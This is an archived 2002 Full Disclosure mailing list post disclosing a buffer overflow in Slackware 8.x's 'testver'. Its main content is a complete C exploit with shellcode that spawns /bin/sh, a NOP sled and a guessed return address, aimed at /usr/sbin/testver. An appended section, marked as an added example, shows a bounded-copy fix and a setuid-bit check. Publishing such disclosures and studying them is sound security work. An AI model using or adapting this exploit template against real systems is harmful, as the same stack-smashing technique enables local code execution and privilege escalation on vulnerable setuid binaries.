Full Disclosure mailing list archives
buffer overflow in "testver" on Slackware NOT SETUID ROOT
From: Day Jay <d4yj4y () yahoo com>
Date: Wed, 20 Nov 2002 22:18:02 -0800 (PST)
Chung's Donut Shop Release
==========================
www.vapid.org/dorian/chungs

For Linux Slackware 8.x

There's a buffer overflow in "testver" on Slackware 8.x. If you pass an argument to testver longer than 4074 bytes it segfaults. Oops. That's plenty of room to insert shellcode.

testver is NOT setuid root. If it was, the attached proof of concept code would give you a root shell. Since it's not, the attached code gives you a normal shell.

This issue was found by d4y-j4y and the attached proof of lamerness was written by d4y-j4y.
d4yj4y () yahoo com

Regards,
d4y-j4y
/*
 Chung's Donut Shop Release
 ==========================
 www.vapid.org/dorian/chungs
 For Linux Slackware 8.x

 There's a buffer overflow in "testver"!! If you pass an argument to testver
 longer than 4074 bytes it segfaults. Oops. That's plenty of room to insert
 shellcode.

 This issue was found by d4y-j4y and this exploit was written by d4y-j4y.
 d4yj4y () yahoo com

 usage:
 $ gcc testver_smash.c -o testver_smash
 $ ./testver_smash
 $

 Not setuid though!!! ARgh!!
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   // memset, memcpy, strlen (missing from the original)
#include <unistd.h>

#define BUFFER   4075  // bytes of payload before the saved return address
#define OVERSIZE 8     // bytes of return address to overwrite

// Ya, you know the shellcode that gives you a shell
char shellcode[] =
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

// Returns the current stack pointer. 32-bit x86 only: relies on %eax
// being the return register, so it needs an unoptimised build (-O0).
unsigned long get_sp(void)
{
    __asm__("movl %esp, %eax");
}

int main()
{
    char buffer[BUFFER + OVERSIZE + 1];
    unsigned long sp;
    long addy;
    int offset = 8;
    int i;

    sp = get_sp();
    offset = 300;        // guessed distance from our %esp to the NOP sled
    addy = sp - offset;

    // Fill the return-address slots with the guessed address
    for (i = BUFFER; i < BUFFER + OVERSIZE; i += 4)
        *(long *)&buffer[i] = addy;

    // NOP sled, then the shellcode ending right before the address slots
    memset(buffer, 0x90, BUFFER - strlen(shellcode));
    memcpy(buffer + BUFFER - strlen(shellcode), shellcode, strlen(shellcode));
    buffer[BUFFER + OVERSIZE] = '\0';

    printf("Chung\'s Donut Shop\ntestver smash by d4y-j4y...\n");
    sleep(3);
    execl("/usr/sbin/testver", "buffer", buffer, NULL);
    return 0;
}
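A defensive counterpart to the post, added here as an example and not part of the original mail or of Slackware's testver: copy_bounded() rejects an argument that would not fit a 4074-byte buffer instead of overrunning it, and is_setuid() performs the check the post's impact assessment rests on (whether the binary carries the setuid bit). testver's own source is not in the post, so the buffer size is the only detail taken from it; the function names and the default path handling are assumptions.

```c
/* Added example, not from the original post: bounded copy into a
 * testver-sized stack buffer, plus a check of the setuid bit. The
 * 4074-byte limit is the post's; testver's own source is not shown. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>

#define ARG_MAX_LEN 4074  /* longest argument the post says testver survives */

/* Fail closed when src (plus its terminator) would not fit in dst; an
 * unchecked strcpy here is the pattern that lets argv[1] overrun the buffer. */
int copy_bounded(char *dst, size_t dst_len, const char *src)
{
    size_t n = 0;
    while (n < dst_len && src[n] != '\0')
        n++;
    if (n == dst_len)      /* no terminator within dst_len bytes */
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Constructs an argument of arg_len 'A's and copies it into a testver-sized buffer. */
int demo_bounded_copy(size_t arg_len)
{
    char dst[ARG_MAX_LEN + 1];
    char *arg = malloc(arg_len + 1);
    if (arg == NULL) return -2;
    memset(arg, 'A', arg_len);
    arg[arg_len] = '\0';
    int rc = copy_bounded(dst, sizeof dst, arg);
    free(arg);
    return rc;
}

/* 1 if path carries the setuid bit, 0 if not, -1 if stat() fails. */
int is_setuid(const char *path)
{
    struct stat st;
    if (stat(path, &st) != 0) return -1;
    return (st.st_mode & S_ISUID) ? 1 : 0;
}

int main(int argc, char **argv)
{
    const char *path = argc > 1 ? argv[1] : "/usr/sbin/testver"; /* path from the post */
    printf("4074-byte arg: %d, 4075-byte arg: %d, setuid(%s): %d\n",
           demo_bounded_copy(4074), demo_bounded_copy(4075), path, is_setuid(path));
    return 0;
}
```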